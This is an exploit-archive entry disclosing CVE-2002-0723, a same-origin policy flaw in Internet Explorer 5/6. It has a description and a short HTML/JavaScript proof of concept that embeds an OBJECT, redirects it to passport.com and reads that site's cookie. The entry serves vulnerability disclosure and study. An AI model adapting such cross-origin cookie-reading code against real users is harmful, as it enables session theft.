Microsoft Internet Explorer 5/6 - OBJECT Tag Same Origin Policy Violation
Author: Thor Larholm
type: remote
platform: windows
port:
date_added: 2002-07-10
date_updated: 2012-09-29
verified: 1
codes: CVE-2002-0723;OSVDB-3003
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/5196/info
Microsoft Internet Explorer allows script code to violate the same origin policy through usage of the HTML OBJECT tag. Malicious script code may obtain a legitimate reference to an embedded object containing a web page from the same domain. This script may then change the location of the embedded object to a sensitive page, and maintain the reference to the object. This provides full access to the DOM of the embedded page.
<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>